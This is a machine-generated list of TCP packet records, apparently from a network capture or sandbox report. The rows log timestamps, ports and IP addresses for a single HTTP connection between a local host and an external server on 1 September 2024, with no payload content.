Sep 1, 2024 18:27:46.414940119 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.415013075 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.415024042 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.415060997 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.415147066 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.415190935 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.415203094 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.415322065 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.415333986 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.415348053 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.415366888 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.415390015 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.419054985 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.419131041 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.419142008 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.419178009 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.419358969 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.419375896 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.419385910 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.419397116 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.419404030 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.419424057 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.427707911 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.427752018 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.427788019 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.427798986 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.427831888 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.428018093 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.428034067 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.428044081 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.428056955 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.428071976 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.428092957 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.428442001 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.428452969 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.428499937 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.428602934 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.428613901 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.428620100 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.428647995 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.428767920 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.428777933 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.428807020 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.431557894 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.431618929 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.431760073 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.431771040 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.431807041 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.431931973 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.431943893 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.431953907 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.431979895 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.432049990 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.432094097 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.443485022 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.443496943 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.443506002 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.443531990 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.443558931 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.443571091 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.443604946 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.443829060 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.443840027 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.443876028 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.443876982 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.443919897 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.444025040 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.444127083 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.444139004 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.444159031 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.444230080 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.444267035 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.444314957 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.444432020 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.444447994 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.444458008 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.444472075 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.444489956 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.456800938 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.456810951 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.456820965 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.456837893 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.456849098 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.456873894 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.456950903 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.457056046 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.457067013 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.457077026 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.457103014 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.457124949 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.457268953 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.461921930 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.461940050 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.461945057 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.461997032 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.462074995 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.462230921 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.462241888 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.462272882 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.462546110 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.462559938 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.462589979 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.467278957 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.467289925 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.467297077 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.467309952 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.467318058 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.467433929 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.467474937 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.467485905 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.467533112 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.471998930 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.472060919 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.472071886 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.472104073 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.472167015 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.472183943 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.472210884 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.472345114 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.472357035 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.472367048 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.472392082 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.472414970 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.483700991 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.483736038 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.483747959 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.483772039 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.483961105 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.483972073 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.483982086 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.483993053 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.484000921 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.484015942 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.484266043 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.484307051 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.484375954 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.484579086 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.484590054 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.484600067 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.484611988 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.484636068 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.484782934 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.484792948 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.484831095 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.488106966 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.488208055 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.488219023 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.488243103 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.488372087 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.488418102 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.488425970 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.488543987 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.488554955 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.488564968 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.488580942 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.488596916 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.496643066 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.496727943 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.496738911 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.496773958 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.496794939 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.496845961 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.496855021 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.496866941 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.496881962 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.496905088 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.497174978 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.497220039 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.497889996 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.497970104 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.497981071 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.498008013 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.498330116 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.498342037 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.498378992 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.498431921 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.498442888 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.498452902 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.498469114 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.498497963 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.503609896 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.503683090 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.503693104 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.503722906 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.503882885 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.503895998 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.503905058 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.503918886 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.503931999 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.503951073 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.504160881 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.504204035 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.507498980 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.507571936 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.507581949 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.507611990 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.507714987 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.507725000 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.507735968 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.507750034 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.507766008 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.507927895 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.508043051 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.508102894 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.516222954 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.516266108 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.516280890 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.516307116 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.516377926 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.516415119 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.516516924 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.516527891 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.516571045 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.516664028 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.516674995 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.516714096 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.516859055 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.516868114 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.516905069 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.516907930 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.517034054 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.517045975 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.517055988 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.517076015 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.517090082 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.517234087 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.517347097 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.517390966 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.523150921 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.523250103 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.523261070 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.523291111 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.523403883 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.523443937 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.523471117 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.523480892 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.523516893 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.523674965 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.523685932 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.523722887 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.543054104 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.543070078 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.543097973 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.543108940 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.543128967 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.543153048 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.543194056 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.543205976 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.543240070 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.543442965 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.543454885 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.543510914 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.544028044 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.544116974 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.544127941 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.544154882 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.544301987 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.544312954 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.544323921 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.544342041 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.544370890 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.544539928 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.563409090 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.563468933 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.563587904 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.563597918 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.563607931 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.563620090 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.563642979 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.563661098 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.563736916 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.563747883 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.563757896 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.563783884 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.569678068 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.569731951 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.569767952 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.569780111 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.569819927 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.569905043 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.569966078 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.569977999 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.569988012 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.570003033 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.570018053 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.574137926 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.574181080 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.574192047 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.574218035 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.574378967 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.574389935 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.574399948 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.574410915 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.574423075 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.574434042 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.578998089 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.579009056 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.579019070 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.579045057 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.579068899 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.579130888 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.579180002 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.579216957 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.579278946 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.579288960 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.579299927 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.579318047 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.583967924 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.584014893 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.584023952 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.584026098 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.584060907 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.584206104 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.584232092 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.584242105 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.584254026 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.584266901 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.584294081 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.584450006 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.584527969 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.584538937 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.584563971 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.584664106 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.584675074 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.584707022 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.584799051 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.584837914 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.584875107 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.584999084 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.585036039 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.585043907 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.585055113 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.585093021 CEST	56160	80	192.168.2.4	94.228.169.44
